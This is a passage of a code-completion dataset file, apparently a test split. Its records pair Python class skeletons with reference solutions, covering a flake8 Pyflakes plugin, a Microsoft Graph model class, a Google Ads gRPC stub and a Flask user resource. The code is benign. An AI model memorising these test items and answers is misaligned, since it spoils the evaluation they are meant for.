False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n<|end_body_0|>\n\n<|body_start_1|>\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n<|end_body_1|>\n\n<|body_start_2|>\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)\n<|end_body_2|>\n\n<|body_start_3|>\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000199", "length_bytes": 5661, "license_type": "permissive", "methods": [{"docstring": "Initialize the PyFlakes plugin with an AST tree and filename.", "name": "__init__", "signature": "def __init__(self, tree, filename)"}, {"docstring": "Register options for PyFlakes on the Flake8 OptionManager.", "name": "add_options", "signature": "def add_options(cls, parser)"}, {"docstring": "Parse option values from Flake8's OptionManager.", "name": "parse_options", "signature": "def parse_options(cls, options)"}, {"docstring": "Run the plugin.", "name": "run", "signature": "def run(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005080", "prompt": "Implement the Python class `FlakesChecker` described below.\n\nClass description:\nSubclass the Pyflakes checker to conform with the flake8 API.\n\nMethod signatures and docstrings:\n- def __init__(self, tree, filename): Initialize the PyFlakes plugin with an AST tree and filename.\n- def add_options(cls, parser): Register options for PyFlakes on the Flake8 OptionManager.\n- def parse_options(cls, options): Parse option values from Flake8's OptionManager.\n- def run(self): Run the plugin.", "prompted_full_text": "Implement the Python class `FlakesChecker` described below.\n\nClass description:\nSubclass the Pyflakes checker to conform with the flake8 API.\n\nMethod signatures and docstrings:\n- def __init__(self, tree, filename): Initialize the PyFlakes plugin with an AST tree and filename.\n- def add_options(cls, parser): Register options for PyFlakes on the Flake8 OptionManager.\n- def parse_options(cls, options): Parse option values from Flake8's OptionManager.\n- def run(self): Run the plugin.\n\n<|skeleton|>\nclass FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n <|body_0|>\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n <|body_1|>\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n <|body_2|>\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n<|end_body_0|>\n\n<|body_start_1|>\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n<|end_body_1|>\n\n<|body_start_2|>\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)\n<|end_body_2|>\n\n<|body_start_3|>\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n<|end_body_3|>\n", "revision_id": "0473ea71751d9086a835c6ae2d34d3bf0b149f4e", "skeleton": "<|skeleton|>\nclass FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n <|body_0|>\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n <|body_1|>\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n <|body_2|>\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n", "source": "the_stack_v2_python_sparse", "source_path": "env/lib/python3.4/site-packages/flake8/plugins/pyflakes.py", "source_repo": "tlksio/tlksio", "split": "test", "star_events_count": 1} {"blob_id": "c2ada04b43ac6b8809c86914a506f66146c5cd0f", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn AccessReviewHistoryInstance()", "from .access_review_history_status import AccessReviewHistoryStatus\nfrom .entity import Entity\nfrom .access_review_history_status import AccessReviewHistoryStatus\nfrom .entity import Entity\nfields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_str_value('downloadUri', self.download_uri)\nwriter.write_datetime_value('expirationDateTime', self.expiration_date_time)\nwriter.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\nwriter.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\nwriter.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\nwriter.write_datetime_value('runDateTime', self.run_date_time)\nwriter.write_enum_value('status', self.status)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n<|end_body_0|>\n\n<|body_start_1|>\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "AccessReviewHistoryInstance", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccessReviewHistoryInstance:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n<|end_body_0|>\n\n<|body_start_1|>\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000200", "length_bytes": 4766, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005170", "prompt": "Implement the Python class `AccessReviewHistoryInstance` described below.\n\nClass description:\nImplement the AccessReviewHistoryInstance class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `AccessReviewHistoryInstance` described below.\n\nClass description:\nImplement the AccessReviewHistoryInstance class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass AccessReviewHistoryInstance:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n<|end_body_0|>\n\n<|body_start_1|>\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass AccessReviewHistoryInstance:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccessReviewHistoryInstance:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/access_review_history_instance.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "aa3939779729620426105e1b734ddc076c0c91b7", "bodies": ["context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')"], "bodies_text": "<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "class_docstring": "Proto file describing the Customer Label service. Service to manage labels on customers.", "class_name": "CustomerLabelServiceServicer", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-generic-cla"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n <|body_0|>\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000201", "length_bytes": 3479, "license_type": "permissive", "methods": [{"docstring": "Returns the requested customer-label relationship in full detail.", "name": "GetCustomerLabel", "signature": "def GetCustomerLabel(self, request, context)"}, {"docstring": "Creates and removes customer-label relationships. Operation statuses are returned.", "name": "MutateCustomerLabels", "signature": "def MutateCustomerLabels(self, request, context)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000686", "prompt": "Implement the Python class `CustomerLabelServiceServicer` described below.\n\nClass description:\nProto file describing the Customer Label service. Service to manage labels on customers.\n\nMethod signatures and docstrings:\n- def GetCustomerLabel(self, request, context): Returns the requested customer-label relationship in full detail.\n- def MutateCustomerLabels(self, request, context): Creates and removes customer-label relationships. Operation statuses are returned.", "prompted_full_text": "Implement the Python class `CustomerLabelServiceServicer` described below.\n\nClass description:\nProto file describing the Customer Label service. Service to manage labels on customers.\n\nMethod signatures and docstrings:\n- def GetCustomerLabel(self, request, context): Returns the requested customer-label relationship in full detail.\n- def MutateCustomerLabels(self, request, context): Creates and removes customer-label relationships. Operation statuses are returned.\n\n<|skeleton|>\nclass CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n <|body_0|>\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "revision_id": "0fc8a7dbf31d9e8e2a4364df93bec5f6b7edd50a", "skeleton": "<|skeleton|>\nclass CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n <|body_0|>\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n", "source": "the_stack_v2_python_sparse", "source_path": "google/ads/google_ads/v1/proto/services/customer_label_service_pb2_grpc.py", "source_repo": "juanmacugat/google-ads-python", "split": "test", "star_events_count": 1} {"blob_id": "d0edc79db99e52ef101296d89d9ea8fc6661c7fb", "bodies": ["user = UserModel.query.get(user_id)\nif not user:\n abort(404, error=f'No user with id={user_id}')\nreturn (user, 200)", "user = UserModel.query.get(user_id)\nif not user:\n abort(404, error=f'No user with id={user_id}')\nuser.username = kwargs['username']\ntry:\n user.save()\n return (user, 200)\nexcept:\n abort(404, error=f'An error occurred while changing the user')", "user = UserModel.query.get(user_id)\nif not user:\n abort(404, error=f'User with id={user_id} is not exists')\ntry:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\nexcept:\n abort(404, error=f'An error occurred while deleting the user')"], "bodies_text": "<|body_start_0|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n<|end_body_0|>\n\n<|body_start_1|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n<|end_body_1|>\n\n<|body_start_2|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n<|end_body_2|>\n", "class_docstring": "", "class_name": "UserResource", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserResource:\n\n def get(self, user_id):\n \"\"\"Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n <|body_0|>\n\n def put(self, user_id, **kwargs):\n \"\"\"Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя\"\"\"\n <|body_1|>\n\n def delete(self, user_id):\n \"\"\"Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n<|end_body_0|>\n\n<|body_start_1|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 